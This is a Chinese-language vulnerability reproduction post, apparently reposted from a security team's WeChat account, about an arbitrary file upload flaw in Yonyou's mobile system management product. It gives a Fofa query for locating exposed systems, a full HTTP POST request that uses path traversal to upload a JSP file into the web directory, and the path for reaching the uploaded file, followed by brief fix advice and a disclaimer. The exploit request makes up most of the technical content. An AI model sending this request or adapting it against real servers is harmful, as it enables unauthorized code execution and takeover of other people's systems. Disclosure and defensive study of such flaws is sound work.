产品简介
用友移动系统管理系统是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。
漏洞描述
用友 移动系统管理 upload 接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
Fofa
app="用友-移动系统管理"
漏洞复现
POST /mobsm/common/upload?category=../webapps/nc_web/maupload/apk HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)
Content-Type: multipart/form-data; boundary=f0172fd9dce75a2e80782ea59104aa75572bb578836be10bb15b5334876a
Content-Length: 265
Accept-Encoding: gzip, deflate, br
Connection: close
--f0172fd9dce75a2e80782ea59104aa75572bb578836be10bb15b5334876a
Content-Disposition: form-data; name="file"; filename="test.jsp"
Content-Type: application/octet-stream
<% out.println("test");%>
--f0172fd9dce75a2e80782ea59104aa75572bb578836be10bb15b5334876a--
返回包带着文件上传后存储的位置
访问路径 /maupload/apk/visitor/xxxxxx.jsp
修复建议
1、如⾮必要,禁⽌公⽹访问该系统。
2、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
3、升级到产品到最新版本
原文始发于微信公众号(凝聚力安全团队):【漏洞复现】用友 移动管理系统 upload 任意文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论